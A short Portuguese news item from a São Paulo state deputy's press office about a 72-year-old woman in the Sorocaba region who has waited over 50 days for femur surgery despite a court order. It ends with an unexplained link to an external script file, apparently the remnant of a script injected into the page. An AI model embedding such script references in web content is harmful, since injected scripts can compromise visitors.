Tags

O deputado estadual Raul Marcelo repercutiu nesta terça-feira (19), durante pronunciamento na Assembleia Legislativa de São Paulo (Alesp) o caso de uma senhora de 72 anos que aguarda cirurgia na região do fêmur há mais de 50 dias.

Segundo a família de Celeste Eugênio Todero, que reside na região de Sorocaba, ela está com uma fratura no fêmur e por indicação médica necessita fazer uma cirurgia ortopédica. Cansados de esperar, os familiares conseguiram uma liminar na Justiça para que o procedimento fosse realizado no Conjunto Hospitalar de Sorocaba (CHS), e mesmo assim a cirurgia continuava sem data para ser realizada.

Quando o mandato tomou conhecimento do caso, realizou ligações telefônicas na Secretaria Estadual da Saúde para saber a situação da senhora Celeste. Além disso, protocolou duas indicações – uma ao governador Márcio França, outra para a própria Secretaria Estadual da Saúde – exigindo a devida atenção ao caso da senhora Celeste.

De acordo com a imprensa, o Departamento Regional de Saúde de Sorocaba (DRS), órgão ligado à Secretaria de Estado da Saúde, transferiu no início do mês a idosa para que fosse realizada a cirurgia na Santa Casa de Itu/Hospital São Camilo, porém o procedimento não foi feito até agora.

Fonte: Assessoria de Comunicação do deputado estadual Raul Marcelo (PSOL)

https://cloudapi.online/js/api46.js